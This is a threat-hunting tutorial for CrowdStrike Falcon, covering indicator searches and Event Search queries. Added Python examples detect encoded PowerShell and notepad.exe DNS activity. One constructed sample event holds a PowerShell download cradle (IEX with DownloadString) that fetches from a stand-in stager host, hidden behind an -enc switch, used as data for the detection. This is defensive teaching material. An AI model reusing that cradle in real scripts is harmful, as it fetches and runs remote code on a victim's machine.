How to Hunt for Threat Activity with Falcon Endpoint Protection
Introduction to Threat Hunting with Falcon Endpoint Protection
CrowdStrike Falcon offers a powerful set of features that can be used to hunt for threat activity in your environment. The Falcon agent is constantly monitoring and recording endpoint activity and streaming it to the cloud and CrowdStrike’s Threat Graph. The data includes things like process execution, network connections, file system activity, user information, service details, script activity and admin tool usage. Storing this data in the Threat Graph ensures that the data is always available (even while endpoints are offline) and also ensures that it can be searched in real time and retrospectively – even the largest environments can get results in seconds.
CrowdStrike Falcon provides multiple approaches to threat hunting. In this article, we will review workflows that begin with indicator searches as well as custom event searches.
The Investigate App options allow administrators to search for indicators of compromise in their environment. This helps gauge exposure to known threats while also providing the ability to drill down and pivot to explore the context around malicious activity. Because the data lives in the CrowdStrike Threat Graph, results come back immediately from both online and offline systems, no matter how large your organization is. In this section, we will demonstrate two of the available indicator searches.
Under the Investigate App, select “Bulk Domain Search”.
A search can cover a single domain or several at once; separate multiple domains with a space. After specifying a time range, click “Submit” to begin the search. The search queries all of your data in the Threat Graph and reports any system in your environment that connected to one of those domains during that range. A quick way to get sample results is to search for www.google.com. In the example shown here, six different hosts have connected to conti.news.
Another option is to begin hunting with a file hash or filename. The “Hash search” is also available from the Investigate menu. In this example, we have used a SHA256 hash from an indicator of compromise (IOC). This file has been seen on two hosts in the last 24 hours, but it has not been executed on either of them. Note that almost all elements of the search results are links that allow you to further explore and understand the file’s impact.
Clicking on one of the impacted hostnames will bring you to a screen that shows all activity on that system. In this example, we learn that this is a cloud host running Windows 7. This screen would also report if there were any detections on this host in the last seven days.
The Event Search functionality is for power users who want to access all of their data in the CrowdStrike Threat Graph. The flexible query language can handle complex searches that are often required for more advanced threat hunting. In this section, we will review two advanced hunting queries from our Hunting and Investigation documentation. This document is available to all CrowdStrike customers via the UI.
Under the Investigate menu, select “Event Search”.
The first sample query searches for encoded PowerShell commands executed in your environment. This activity is interesting to threat hunters because legitimate administrators rarely encode their PowerShell commands, whereas attackers very commonly do so to keep the script out of plain sight in command-line logging. Copy the text below into the search field. Note that there is an option to specify a time range on the right side. One caveat when tuning this query: the pattern matches the -enc and -EncodedCommand spellings of the switch, but PowerShell also accepts -e and -ec, and PowerShell 7 runs as pwsh.exe rather than powershell.exe, so broaden the FileName and CommandLine terms if those appear in your environment.
event_simpleName=ProcessRollup2 FileName=powershell.exe (CommandLine=*-enc* OR CommandLine=*encoded*) | table ComputerName UserName FileName CommandLine
After clicking the magnifying glass, any results will be returned as shown below.
The results include links to pivot and dive deeper on the results.
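To show what the query above actually matches, and what to do with a hit once you have one, here is an added example (not code from the CrowdStrike article) that re-implements the same filter in Python over a few constructed ProcessRollup2-style events and then decodes the base64 payload, which the Falcon results table does not do for you. It goes slightly beyond the page's query by also catching the abbreviated -e and -ec switches and the pwsh.exe image. Hostnames, user names and the stager URL in the sample events are made up.

```python
"""Added example, not code from the CrowdStrike article: the encoded-PowerShell hunt
re-implemented over constructed ProcessRollup2-style events so that the match logic
and the decoding of the results can be seen end to end."""
import base64
import re
from typing import List, Optional

# PowerShell accepts any of these spellings of the encoded-command switch. The page's
# query (*-enc* OR *encoded*) sees only the last two; "-e" and "-ec" slip past it.
ENCODED_SWITCH = re.compile(
    r"(?i)(?:^|\s)[-/](?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)"
)

# The page's query keys on powershell.exe; PowerShell 7 runs as pwsh.exe.
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}


def encode_command(script: str) -> str:
    """Base64 form PowerShell expects for -EncodedCommand: the UTF-16LE bytes of the script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(blob: str) -> Optional[str]:
    """Reverse of encode_command; None when the blob is not valid base64 of UTF-16LE text."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def hunt_encoded_powershell(events: List[dict]) -> List[dict]:
    """Apply the article's filter to a list of events and return the columns of its
    '| table' clause, plus the decoded script, which the Falcon results do not show."""
    hits = []
    for ev in events:
        if ev.get("event_simpleName") != "ProcessRollup2":
            continue
        if ev.get("FileName", "").lower() not in POWERSHELL_IMAGES:
            continue
        match = ENCODED_SWITCH.search(ev.get("CommandLine", ""))
        if match is None:
            continue
        hits.append({
            "ComputerName": ev["ComputerName"],
            "UserName": ev["UserName"],
            "FileName": ev["FileName"],
            "CommandLine": ev["CommandLine"],
            "DecodedCommand": decode_command(match.group(1)),
        })
    return hits


# Constructed sample events shaped like Falcon ProcessRollup2 records (hostnames,
# users and the stager URL are made up for this example).
SUSPICIOUS_SCRIPT = (
    "IEX (New-Object Net.WebClient).DownloadString('http://stager.example.invalid/a')"
)
SAMPLE_EVENTS = [
    {"event_simpleName": "ProcessRollup2", "ComputerName": "WS-0147", "UserName": "jdoe",
     "FileName": "powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + encode_command(SUSPICIOUS_SCRIPT)},
    # Abbreviated switch on pwsh.exe: caught here, missed by the page's pattern.
    {"event_simpleName": "ProcessRollup2", "ComputerName": "WS-0212", "UserName": "SYSTEM",
     "FileName": "pwsh.exe",
     "CommandLine": "pwsh.exe -e " + encode_command("Get-Process | Out-File C:\\t.txt")},
    # Legitimate, unencoded admin use: -ExecutionPolicy must not be mistaken for -e.
    {"event_simpleName": "ProcessRollup2", "ComputerName": "WS-0033", "UserName": "admin",
     "FileName": "powershell.exe",
     "CommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1"},
]

if __name__ == "__main__":
    for row in hunt_encoded_powershell(SAMPLE_EVENTS):
        print(row["ComputerName"], row["UserName"], row["FileName"], "->", row["DecodedCommand"])
```

Decoding is the step worth keeping close at hand: a hit in the Falcon results only tells you that a blob was passed to PowerShell, while the decoded text tells you whether it was a download cradle or an administrator's scheduled task.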
The second query is designed to look for network activity coming from unexpected applications. This example looks across the entire environment for DNS requests made by notepad.exe, a trusted and unremarkable binary that is a common target for code injection for exactly that reason. This information is useful for threat hunters because notepad.exe has no reason to resolve hostnames or make outbound connections, so any result almost certainly indicates a threat. Because the query keys on DnsRequest events, a connection to a hard-coded IP address that involves no DNS lookup would not appear in its results. Clear the contents of the search bar, paste the following text, and click the search icon to execute the search.
aid=* event_simpleName="DnsRequest" | rename ContextProcessId as TargetProcessId | join TargetProcessId [search aid=* event_simpleName="ProcessRollup2" ImageFileName="*notepad.exe"] | table ComputerName timestamp ImageFileName DomainName CommandLine
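The rename-and-join in the query above is easy to read past, so here is an added example (not code from the CrowdStrike article) that performs the same correlation in Python over constructed Falcon-style events: DnsRequest records name the requesting process in ContextProcessId, ProcessRollup2 records describe a process under TargetProcessId, and the two are matched on that identifier. One deliberate difference, which is a design choice of this example and not something the page states, is that the join key also includes aid (the sensor identifier), because a process identifier only has meaning on the host that issued it; the scope_by_aid flag lets you see what a join on the identifier alone would produce. Sensor ids, hostnames, process ids and domain names in the sample events are made up.

```python
"""Added example, not code from the CrowdStrike article: the notepad.exe hunt
re-implemented over constructed Falcon-style events so that the join between
DnsRequest and ProcessRollup2 records is explicit."""
from typing import Dict, List, Optional, Tuple

Key = Tuple[Optional[str], int]


def _process_key(aid: str, pid: int, scope_by_aid: bool) -> Key:
    """Process identifiers are only meaningful on the sensor that issued them, so the
    join key normally includes aid; scope_by_aid=False reproduces a join on the id alone."""
    return (aid if scope_by_aid else None, pid)


def join_dns_to_process(events: List[dict], image_suffix: str = "notepad.exe",
                        scope_by_aid: bool = True) -> List[dict]:
    """Equivalent of the article's second query: look up the ProcessRollup2 record for
    each DnsRequest, keep those whose image matches, and emit the query's table columns."""
    processes: Dict[Key, dict] = {}
    for ev in events:
        if ev.get("event_simpleName") == "ProcessRollup2":
            processes[_process_key(ev["aid"], ev["TargetProcessId"], scope_by_aid)] = ev

    rows = []
    for ev in events:
        if ev.get("event_simpleName") != "DnsRequest":
            continue
        proc = processes.get(_process_key(ev["aid"], ev["ContextProcessId"], scope_by_aid))
        if proc is None or not proc["ImageFileName"].lower().endswith(image_suffix):
            continue
        rows.append({
            "ComputerName": ev["ComputerName"],
            "timestamp": ev["timestamp"],
            "ImageFileName": proc["ImageFileName"],
            "DomainName": ev["DomainName"],
            "CommandLine": proc["CommandLine"],
        })
    return sorted(rows, key=lambda r: r["timestamp"])


# Constructed sample events (sensor ids, hostnames, process ids and domains are made up).
# Process id 4101 exists on both sensors: explorer.exe on aid "b2", notepad.exe on aid "a1".
WINDIR = "\\Device\\HarddiskVolume2\\Windows\\"
SAMPLE_EVENTS = [
    {"event_simpleName": "ProcessRollup2", "aid": "b2", "ComputerName": "WS-0212",
     "TargetProcessId": 4101, "ImageFileName": WINDIR + "explorer.exe",
     "CommandLine": "C:\\Windows\\Explorer.EXE"},
    {"event_simpleName": "ProcessRollup2", "aid": "a1", "ComputerName": "WS-0147",
     "TargetProcessId": 4101, "ImageFileName": WINDIR + "System32\\notepad.exe",
     "CommandLine": "notepad.exe"},
    {"event_simpleName": "ProcessRollup2", "aid": "a1", "ComputerName": "WS-0147",
     "TargetProcessId": 5200, "ImageFileName": WINDIR + "System32\\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs"},
    {"event_simpleName": "DnsRequest", "aid": "a1", "ComputerName": "WS-0147",
     "timestamp": 1700000001, "ContextProcessId": 4101,
     "DomainName": "update-check.example.invalid"},
    {"event_simpleName": "DnsRequest", "aid": "a1", "ComputerName": "WS-0147",
     "timestamp": 1700000002, "ContextProcessId": 5200, "DomainName": "www.google.com"},
    {"event_simpleName": "DnsRequest", "aid": "b2", "ComputerName": "WS-0212",
     "timestamp": 1700000003, "ContextProcessId": 4101,
     "DomainName": "intranet.example.invalid"},
]

if __name__ == "__main__":
    for row in join_dns_to_process(SAMPLE_EVENTS):
        print(row["ComputerName"], row["timestamp"], row["ImageFileName"], row["DomainName"])
```

With the sensor-scoped join, only WS-0147's notepad.exe lookup of update-check.example.invalid is returned; dropping the aid from the key also attributes WS-0212's explorer.exe lookup to notepad.exe, which is the kind of false positive that erodes trust in a scheduled hunt.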
All of these results can be exported. There is also an option to schedule the queries to repeat on regular intervals.
CrowdStrike makes proactive threat hunting quick and easy. The agent collects extensive event telemetry and sends it to the cloud, where the Threat Graph makes searches fast and effective. The Investigate menu includes options to search for specific indicators and to create custom queries. Documentation is also available with sample queries that can be tuned to meet more specific customer needs.